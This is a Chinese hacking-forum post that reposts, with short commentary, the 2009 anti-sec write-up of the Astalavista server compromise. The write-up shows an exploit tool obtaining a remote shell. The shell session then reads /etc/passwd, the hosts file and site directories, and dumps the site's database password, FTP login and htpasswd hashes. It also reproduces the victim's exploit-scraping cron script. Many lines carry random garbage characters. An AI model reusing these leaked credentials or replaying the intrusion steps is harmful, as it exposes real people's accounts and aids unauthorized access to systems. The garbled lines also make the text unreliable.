找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2208|回复: 0
打印 上一主题 下一主题

Astalavista被蹂躏过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:07:34 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。" v( t* G) @) A
2 \6 z. h$ u7 j/ M; h; f
[root@front3 ~]# curl -I litespeedtech.com! v1 o; L' g6 L3 z* P
HTTP/1.1 200 OK, H$ C/ T9 Q2 c) w- I0 j3 `
Date: Fri, 05 Jun 2009 22:54:51 GMT8 a$ O5 S3 L) _; B2 b+ V; r
Server: LiteSpeed
) V* S6 A) ^5 [! Y1 Y; ?! U5 E! a4 E, ?" r, C8 {7 l8 G
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-) |( |  X& C. d7 L0 }3 A

8 C$ g+ L3 k: r有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
) S, P) [$ J0 i6 [0 t. z# i
5 X' X( W# n1 q+ d
7 u& I6 u, i0 M4 |/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
& |# f* a6 h# y, A: g1 D2 y- G2 F2 v- ]" |/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \' `; t6 S- Q& z* `7 A6 B+ g
/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
2 G9 S" D3 A4 c\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /- O& n& e0 L9 K7 d8 B! c4 z/ @
        \/        \/                 \/        \/       \/                     \/                 \/7 g6 ?. y, b5 {9 |
                                  The Hacking & Security Community
7 V; f. A* r) Q5 Q( O2 q[+] Founded in 1997 by a hacker computer enthusiast/ s# Y' Z3 j3 K
[-] Exposed in 2009 by anti-sec group& ]8 m1 {7 A1 e" Y) q$ j

8 R% u0 n# e! p2 D# Q& o& oFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
& p# T% ?, h; h0 o2 D>> 03. Who’s behind the site?
& N: K" T" y( U% C$ G& s; a7 n>>* a& E$ l2 h/ l7 h( |
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
8 R* ^9 T* o' K) H1 o4 Y
( O) L' }, ~9 c; A: {$ H: a>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
2 |1 ^- q; l% r>>; E# J8 N. R" l; B
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and7 c$ J: R1 z7 P* u
military institutions.
/ q# \; T) P( |$ s$ t>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
. Y3 \( a# e- f' k+ h
, }& n3 z2 L8 j  pWhy has Astalavista been targeted?
" {, X' m) R& w% t/ w# X
+ k# e, \) Z0 q2 dOther than the fact that they are not doing any of this for the “community” but
& |: N1 Y4 D4 P! i0 i! Yfor the money, they spread exploits for kids, claim to be a security community
3 s2 @4 }! d( m- r(with no real sense of security on their own servers), and they charge you $6.667 c8 R4 L" |% T& U5 z: z8 X
per months to access a dead forum with a directory filled with public releases
+ v# f4 R' e, A( _5 l! Cand outdated / broken services.2 j9 Y% U: _5 B5 {4 M

; A# u$ ~+ @; x2 S' E) RWe wanted to see how good that “team of security and IT professionals” really is.
% Q) n% I4 A3 @' M9 V0 C' C8 P; l" `
Let’s begin.
6 l) w. i& H2 ~
; X+ N% {& j( Ganti-sec:~# ./g0tshell astalavista.com -p 808 `; v9 q: _1 S( M% a5 R9 V
[+] Connecting to astalavista.com:80
; D8 ~: d2 y% _& w7 S* p8 b[+] Grabbing banner…8 S0 i( [: [" |- @7 Q2 u7 C
LiteSpeed7 D/ o) ^( Q9 F4 _* W% }
[+] Injecting shellcode…, i* ]4 `, I- T! K( e
[-] Wait for it/ P9 I' {  a. y, W2 q9 G2 U" T& e
, ?) F4 }- q( E3 y) ]3 l- P
[~] We g0tshell
% X: ?! y! ]0 G9 C3 |; ]  h* [uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux) `" _9 r" g9 [6 y
ID: uid=100(apache) gid=500(apache) groups=500(apache)
! o4 B+ q9 O/ `1 |: W. {! n+ a
- P( X( p, V  Z5 f) w* K8 S+ Hsh-3.2$ cat /etc/passwd; b8 T6 \9 }0 Y$ o5 m
root:x:0:0:root:/root:/bin/bash
: x) V3 ^- i, a# T: v8 l& N9 ~bin:x:1:1:bin:/bin:/sbin/nologin
  X7 w" k% I: tdaemon:x:2:2:daemon:/sbin:/sbin/nologin  u6 W8 L* W0 t9 w
adm:x:3:4:adm:/var/adm:/sbin/nologin0 G( o5 h# _+ h$ m. a
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
; I& D3 T# M0 c1 l1 A- Ssync:x:5:0:sync:/sbin:/bin/sync$ K# E, a) ]4 [+ f
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- g. x; U$ H' o9 A' P, Ghalt:x:7:0:halt:/sbin:/sbin/halt
% }$ ?0 D: {, amail:x:8:12:mail:/var/spool/mail:/sbin/nologin
4 r* a* C6 Q. z' T8 Rnews:x:9:13:news:/etc/news:
/ l; Z5 H6 v& I4 n# [$ H. G7 @, huucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin) I0 F1 h6 Y: T% ]4 `
operator:x:11:0perator:/root:/sbin/nologin, \2 X3 c9 o; |: n% C8 y
games:x:12:100:games:/usr/games:/sbin/nologin
. P4 V8 V* x2 o' N7 u) `gopher:x:13:30:gopher:/var/gopher:/sbin/nologin3 m$ T& {+ H$ m; h
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin( g) K: Z/ a' D7 x  n
nobody:x:99:99:Nobody:/:/sbin/nologin9 [; K9 A8 e- l
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
1 @7 ]" A% g6 M4 S( T- o$ @dbus:x:81:81:System message bus:/:/sbin/nologin
2 o5 @5 @$ H6 M  bnscd:x:28:28:NSCD Daemon:/:/sbin/nologin/ s! ~  M! }  h# F3 a
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin: C1 a/ A+ O$ a: D3 S0 z9 D/ a. ?. b
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin  J% T# ^+ L! q  `6 X% |$ `' D6 U
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
! a; J0 Y+ O% K, j" Xhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
* ~) C- k0 U; f  Xrpc:x:32:32ortmapper RPC user:/:/sbin/nologin: I5 V9 m; {9 w8 ~9 W/ ?+ C+ ~
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin) B9 @7 e* j. y# h6 a
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin' E; _9 l- a# l2 n/ o9 p7 g8 U
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
2 A5 B6 E4 R" V& C/ ypcap:x:77:77::/var/arpwatch:/sbin/nologin3 b  w0 e( O$ q' j/ n  u- }
named:x:25:25:Named:/var/named:/sbin/nologin# x6 T: l  x0 I
apache:x:100:500::/var/www:/bin/false# S; F7 B) q3 ~+ b  k
diradmin:x:101:101::/usr/local/directadmin:/bin/bash( G$ A3 x' D' d; D
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash/ \: p# f( e% l. o1 e& d
webapps:x:500:501::/var/www/html:/bin/bash
( w+ L% x9 ^* p2 [& l3 }majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash5 M0 p4 e" ?1 o, d# Y
admin:x:501:502::/home/admin:/bin/bash
8 }+ Y9 w  o, C( q3 Q  q7 M- ]jon:x:502:503::/home/jon:/bin/bash2 \; f* I0 |& F. A( Z! Y
com:x:503:504::/home/com:/bin/bash
4 q( D) H" q3 N& t0 v' Pntp:x:38:38::/etc/ntp:/sbin/nologin+ [+ m9 q- `! s% d
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
+ K" p% i- R' t1 Z* c% B2 _2 Q& ^9 Castanet:x:504:505::/home/astanet:/bin/bash: `) M  j& t/ C  F1 y8 q4 G
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
" H3 `5 L: e: X2 V" Y$ D7 Uavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
% D1 T2 B# @9 ^5 B+ g. q, J5 U5 l/ J! u5 h* L% L
sh-3.2$ cat /etc/hosts
! X1 z6 K( P4 ^/ M1 M% S* F$ [# Do not remove the following line, or various programs
7 S% n* R5 j2 W! h; b' O1 I# that require network functionality will fail." p7 k& E! H0 t, w8 d1 d4 [  q
127.0.0.1       localhost.localdomain   localhost
- |3 z0 Y0 F, O8 b/ }0 u# |::1     localhost6.localdomain6 localhost6/ e) d9 e" N/ T: X, [* M7 W2 M/ d
80.74.154.172           asta1.astalavistaserver.com
6 \! r- J# W6 H2 M; g9 ~' n7 n$ T  }/ p
sh-3.2$ pwd' c8 }4 @( @% M- _+ y+ q0 K8 S
/home/com/public_html) L& G) |' [: v2 d: F+ g9 F

! A6 k. C/ |6 S! b' _sh-3.2$ ls -la4 z+ w" T2 G6 H* |& m4 G
total 18460
' Z, Y! n9 O3 O* jdrwxr-xr-x 30 com apache     4096 May 28 17:06 .
3 M/ G" _" W: |5 R7 Q" Idrwx–x–x 11 com com        4096 Jun 25  2008 ..
* z) M# \5 O& J/ T) H( Z5 Fdrwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
# H  I9 m. P4 _drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
8 D: A! E$ u7 _! Jdrwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
% U) ?; ?4 p1 A  N) Tdrwxrwxrwx  2 com com        4096 May 19 00:50 config# m* y5 ]2 l* B
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core: O/ w3 F8 t6 R- b5 x6 [; j  d
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules- ]2 h0 }) y  o+ h
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
3 n0 P0 o+ x+ }7 W, ~drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo# v1 V3 k8 a# }% ]+ H3 p; R
drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
9 ~9 t$ \; N7 n4 m$ J; l-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php
) e( }- @: Q: ~- rdrwxr-xr-x  2 com com        4096 Sep  9  2008 dvd* P/ Q7 F: t5 R4 q
drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
9 B3 [; l+ L4 Q' j6 s: Z0 K-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
( e8 H* h% Z- h  Ydrwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
+ o$ _: c3 L. A* a3 U% X-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
, P3 L7 ?1 t! o-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak% H" F4 C  e* q" S/ d& R' f7 d' e1 F
-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak5 P1 R( }: b- c+ E6 I# n! [
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
. k3 h: n% V% ^2 p* T2 g7 wdrwxrwxrwx 14 com com        4096 Feb  2 19:29 images
5 B7 x' c. H; w+ F, p-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
+ }; ?6 l) W. Bdrwxr-xr-x  6 com com        4096 Feb  2 19:29 installer% p9 `- f+ ^7 a! f; H
drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang4 j7 h* p% a$ e7 ~
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib$ f% A  d2 k( k3 @" y8 O) w
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
: w' Y/ H7 @  f1 N6 |7 l" odrwxr-xr-x  8 com com        4096 May 11 12:48 modifications  A% c2 T' Y3 b" T4 \8 m
drwxr-xr-x 34 com com        4096 May 28 16:30 modules
+ r& a' ^) }' x5 C8 Cdrwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin7 L+ |( O( e) c; m6 L
drwxrwxr-x 22 com com        4096 May 28 17:06 _new
. _' M! ?7 G3 E; k4 S5 fdrwxr-xr-x 26 com com        4096 Feb  2 19:27 _old& a/ L: k- i% z9 K$ |. S, I
drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy; h& Y$ {' V0 ]6 h5 K4 `
drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
1 \, i* z& i# {/ x) q/ a; w-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt3 f' @0 e& O1 h
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml' b2 h# o( o( u7 ?4 q
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php: J/ H2 z! b9 p1 o2 g* x/ v) ?
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
& R' x& ^& b. gdrwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp* {% k& P: r$ M# q' S0 q. K1 G
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam
  [* J: x- C2 n
+ R7 P4 r4 D9 a) {sh-3.2$ head -20 index.php
9 o0 v: a2 Z. s, b<?php+ V& t/ A( b8 U+ ?: }/ t

4 K2 i+ A" H& }0 [7 p9 [/**. [; d" J4 o+ H5 [0 k6 \
* The main page for the CMS
- `; n( s# }3 ^& p* @copyright   CONTREXX CMS - COMVATION AG) e% N5 S6 i9 t+ A8 B
* @author      Comvation Development Team
0 e  {7 L* A' T9 c* @version     v1.0.9.10.1 stable4 U% z& [5 l; _4 D: p, K
* @package        contrexx* E9 q* {; G9 {# J5 I/ ^& s) G" W
* @subpackage    core
* D1 c' j; D3 c' `! e& R* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
& Q. b& P% r) P% L, Y& h3 k" f" `8 A* @since       v0.0.0.0
8 r* x* k2 V$ w( ]8 t3 i- i9 [* @todo        Capitalize all class names in project- n5 U% ~  ^" G3 S; Y4 _
* @uses        /config/configuration.php
, _$ q" p4 c5 Z* t* ]& r* @uses        /config/settings.php1 x. I  g, a  E
* @uses        /config/version.php' h# ~* g5 q+ m3 _; z
* @uses        /core/API.php( @$ j. S3 R+ K. [) S
* @uses        /core_modules/cache/index.class.php
4 i' {' Y5 e6 H$ P- j2 z6 i5 |6 x* @uses        /core/error.class.php
$ t$ M* G$ R* p1 b. h; g' b* @uses        /core_modules/banner/index.class.php
7 f; G( F* c( x1 e" N* @uses        /core_modules/contact/index.class.php
8 e# }+ P2 A2 u3 t6 E1 f+ H, }# Q' f* ]' C
sh-3.2$ cd config/8 t9 q. x" M! K0 [
sh-3.2$ ls -la
( M: R, `' S1 @* Y6 F8 n6 r: v. wtotal 321 C5 a9 Q( q" H) \
drwxrwxrwx  2 com com    4096 May 19 00:50 .8 n6 w; u( w# M* s5 {4 H& q! s
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..1 B' ~7 ], D7 r8 l& v4 E
-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
/ A# B7 y+ [% A" d+ v8 y-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
) U; r6 i4 w8 a2 _+ q-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
' m+ e# G% _9 b-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
& c# A5 |; M4 ]7 T
) \9 B- H( ?: ?sh-3.2$ cat configuration.php* c# f' `( {4 ?! V$ B% ?& U
[snip]
* n' d; g% g8 u) Q$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
- Q) F" g3 O5 h# n: H$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
- m  X2 F- h! r/ B! k2 g  k$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix5 ]6 C9 u$ N# ^, z8 v
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
: i0 Q9 G& o) F" p$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password+ Z0 @6 l! }+ S2 O9 M, t
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)# T9 t- U8 z5 R$ ~9 r  X
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)1 f: m' p' z) W4 R) }0 D
[snip]
/ p, O# P$ S+ w+ I2 t+ O$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
( \& h+ x2 K6 ]$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode
6 u4 Z7 w6 Y& G# s" m3 Z$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost6 b2 i9 y, u9 E& j
$_FTPCONFIG['port'] = 21; // Ftp remote port
( _" r8 d/ X! F/ m& b# k$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
- p& R! ]7 h, `0 m: X5 S& X2 W$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password) m; x# K  z) G8 J+ J1 R1 w
$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms4 q, P. Y2 K9 o; S- t, D
( N* A4 w+ C0 W1 R6 H) H
sh-3.2$ cd ..
+ j0 U1 v4 |) p! K# Qsh-3.2$ cd dvd/
9 F) B' D+ b, @7 Csh-3.2$ ls -la9 w2 i( ?# p2 ^
total 2913780) f  `" P6 N" z+ @5 X  M4 j# R, [
drwxr-xr-x  2 com com          4096 Sep  9  2008 .
  x6 }: K" i+ u3 N/ l- X; M5 n6 _) rdrwxr-xr-x 30 com apache       4096 May 28 17:06 ..( ?) ]. V0 x2 n' q. c
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
. `4 f% S  k" i9 x/ Y-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
4 f. P' d  E$ Q1 g7 c4 \-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar
6 p6 f3 h( k0 Q! @. \-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess
7 k) S  B, b" q, B: N; b) m
: D! p1 h! w8 Y% {6 @" V! Y+ dsh-3.2$ cat .htaccess
3 S/ p; O+ z, y- K- W1 [authType Basic6 l- C7 d! f4 z# j  F9 G# X! D
authName DVD5 n. [7 r7 H/ N% b3 X& F* i0 }! [0 m
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd& ], R; ?" n5 j
require valid-user5 U& P/ L- B, I. h. T) R5 b
" |4 q, Q7 W# _0 b. t! p/ g) j
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd. x4 \/ U# q8 u0 v' O; a
DVDdownload:CRD8cuY6.MPT6
* M- ~: K) N. I4 h  cDVDdownload2:CR8a36.wluFMg
8 m$ X5 @/ Z+ n1 y
7 T8 r, ]  p4 b) F7 R7 f6 w1 Dsh-3.2$ cat test.php) V! o6 O  v3 m% R, N
<?php0 I& J# M( n% @4 o5 k" V1 z
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
: ?' u, k. _5 [! t$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));( w3 _3 h9 Y- a1 l4 P% {
echo $url;. j  v0 z2 P1 i4 P" V8 B0 }
?>( }% Z# I" F) x! t9 m  j0 p
( x0 }" _8 W* B
sh-3.2$ cd modifications/" ^: W, A: t7 N
sh-3.2$ ls -la: K9 h' c; W) L1 X1 \
total 323 @( d# u* A9 u' `( e
drwxr-xr-x  8 com com    4096 May 11 12:48 .
( [: F1 N1 B, u8 E  e# a& r& J! odrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- ?' V1 j7 k& C8 ~8 Odrwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng) p! W: c" {. p
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs- F- B: U5 U9 B1 F
drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools5 b, p" x( u0 w2 V* D
drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
7 w+ D) @( p* [4 idrwxr-xr-x  2 com com    4096 Feb  2 19:33 search
* y5 N7 z# X1 `$ b5 Tdrwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp7 l& b7 Y, c: u+ d* O" u
4 Z8 Q! M4 x! K
sh-3.2$ ls -R* \$ o" g3 S' Z, |! S
.:
- s8 T( |; t- w8 V9 tcom_avtng  cronjobs  onlinetools  pjirc  search  _tmp* x4 ]* K, g$ y) S# ^
4 a9 c+ k+ ~  B
./com_avtng:+ L% C5 p6 v& E9 `' g
avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts
8 ?, U3 P3 r! [$ @
0 e5 k2 X( ]! R./com_avtng/scripts:
7 r6 k' _. U& m2 A$ P' c2 \5 }popunder.js- Z9 `2 L/ w, A' j, {
( d+ H- Y0 U' y5 m
./cronjobs:' s) u9 y- o% D* v
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp
% s3 O7 q/ L) y" z4 F; L7 I% n
) G, n- F  J( y" {- Q./cronjobs/tmp:
  J2 @$ j. u: c$ H) A3 x3 |2 rcontrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
  j: v7 F9 I% L; o/ W( [; |( c  `% C% `
./onlinetools:$ |- \6 t3 M0 P8 @9 a5 `
index.php
4 a! k8 I. g# @% S# J3 j2 ~% c; K& d/ _
./pjirc:
( l3 B5 c4 A. b3 a4 Ta_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt6 U5 \8 v- g; |& G' J
AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
8 H# n! J; O7 T4 }background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd+ e, G6 p8 [$ Y5 p

4 T' _. Z, n4 m2 x8 x./pjirc/img:
/ u5 t& c9 A7 }0 {* D* Zange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif6 R+ W; L& j6 x2 A# I% a6 w/ C
arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   2 ^$ L6 k; c& }( v2 |0 p3 q, G$ U, Z( x
verre-eau.gif
& A: Q( g- T. y" \3 wargh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  7 l5 w5 d8 U+ k$ q
verre-vin.gif; L2 U) J) P- Q2 J  C. N
ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
% _& `' K& h6 O0 }biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif  X2 Q. S* Y" M( {. K8 D& w0 d2 z

! A# Y6 l! F5 w* S; T./pjirc/snd:5 j4 M5 i  A' D
bell2.au  ding.au
) O4 s* E5 R: [; P$ B, U% m9 x' Z
: E" O8 A/ B$ S" C4 k% y% s# `: h./search:/ m( t, X6 S4 D- n
searchEngines.php  search.php! }+ ]) V1 e! P3 t" Z# W
3 r( B; R8 T1 R: E2 P7 A, x- U
./_tmp:
+ V6 r9 M7 a6 k* t1 \' u$ U7 \5 DdefaultPorts.php  defaultPorts.txt- {' D, U9 a; e* Z

3 z3 u: k7 L' ]$ ~& {( @, M* xsh-3.2$ cd cronjobs/" A! t+ ~8 A  J# g+ n8 K" u: \4 d& U
sh-3.2$ cat exploits.php8 t& s: ^& l- |6 d+ B& W
[snip]9 M3 c+ h( a9 S( E6 W+ W% O5 H
$categories   = array();
0 `% N! c# @- d& J( X9 }) c$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;( ]! \3 m' b# k& \& K5 p
$expolits     = file($milw0rmFile);1 e- Q/ @/ j- H+ A6 j3 V
$comExploits  = array();) t) a* ^, q: K' H
[snip]4 F8 I) n: ]3 Y- D' {2 g
// manage data# w8 \' D/ y% x' [; r
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
" }! s' F3 o  h. K1 D; c% V; ^; h! m8 U5 W! S5 y6 r$ m0 B
    // get path and title) q; {7 r- J. v
    $expolits[$x] = trim($expolits[$x]);
5 C& }1 Q- A# \0 v" `* m    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
6 E( Y* U5 x) I7 P4 M6 l    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
, F! e- ?0 `* N7 K
4 N* P# g& a+ n6 }  Z5 S2 W    // check if file exists$ z& ?' C: ]7 k" ?2 q  k
    if (file_exists($path)) {- U0 |2 w6 H9 V; w7 D7 ~8 g
, X2 a  E* v5 C* u
        $text = file_get_contents($path);( ?5 I% g& @# j7 ?

' C" L9 L  x! k% }% T% C        // get content and date
2 e% L$ x( @# T5 ]4 E, D        //$text = htmlspecialchars($text, ENT_QUOTES);! ?* ]3 ^( G) F( I
        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));
( `! B8 {# \$ `2 }& P7 U+ K) A        if ($tmptext != ”) {
8 z+ Q/ q, }% k+ _' U            $text = $tmptext;
/ b# r& m& p7 u8 l1 y8 I% k        } else {- V1 e1 A, |/ P. O. J
            $text = addslashes(htmlentities($text,  ENT_QUOTES));- c, K( `& ?( }' B( y! ]5 g0 W8 M+ H' l
        }
, j2 {7 d2 g% J2 {9 ~2 r        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));" M+ u. b4 u1 D
        $tmp  = explode('-', $date);$ D0 w2 _  p3 |  T, [
        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));7 S6 W2 y+ l* N) `
        $cat  = getCategory ($path);/ ~" O' `$ ~9 l4 B( N+ `2 O
        $ext  = pathinfo(basename($path));
* K9 P& |" f) H6 x4 e# `. q; Y        $ext  = $ext['extension'];, h4 B& L' s& k2 L7 G
        $qStr = ”
! x! B9 }" A9 Z! b$ B            SELECT  `id`" B8 f- L/ `; V, _/ H7 K
            FROM    `contrexx_module_exploits`. N4 j* j' ?/ e; p! `- A9 [2 U
            WHERE   `title`  =  ‘” . $title . “‘
0 t! N& c9 [& U# d: w) t. g. z            AND     `date`   =  ‘” . $date . “‘$ P! L& \, w8 X1 C0 A
        “;2 L* C+ x. J3 R) v3 K) Z7 {  C
        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
. |, s. _+ X1 a; }) P; P0 _  `        $q = $_objDB->query($qStr);; g) f; P7 t, c3 E% K

/ Y0 }! y1 v/ v+ X' T7 X7 `3 z" A        if ($q->numRows() == 0) {
$ B/ U3 `0 i0 X3 Y3 t# }
' _- l( m, w& ~4 v            // prepare array
9 `( Y; T7 }+ A4 L& z" ?            $comExploits[$x]['date']      = $date;
9 y& f" w" J; Y& \5 s4 c, Y! p3 @            $comExploits[$x]['title']     = $title;
7 O9 `7 M9 T2 [/ q$ b) G" d            $comExploits[$x]['author']    = ‘milw0rm’;" F% I$ _+ X; F6 L: o7 x
            $comExploits[$x]['text']      = $text;! ^1 t1 A8 ~/ U
            $comExploits[$x]['source']    = $ext;
- i/ Y: j' `' T0 a0 r            $comExploits[$x]['url1']      = ”;
8 X1 {4 v0 }1 O+ W            $comExploits[$x]['url2']      = ”;: C8 I' S3 x5 _% g
            $comExploits[$x]['catid']     = $cat;
. h6 P( K3 H2 [5 D& A1 i            $comExploits[$x]['lang']      = ‘2′;% j/ ^, f( m8 {* q% J, f8 [/ [  `/ u
            $comExploits[$x]['userid']    = ‘12′;1 Z9 G! }# d$ X1 B8 N# I
            $comExploits[$x]['startdate'] = ‘0000-00-00′;- v- [5 l% Z4 ~" l
            $comExploits[$x]['enddate']   = ‘0000-00-00′;8 J' N: ~3 \1 M9 ~$ Q( W+ ^$ ^
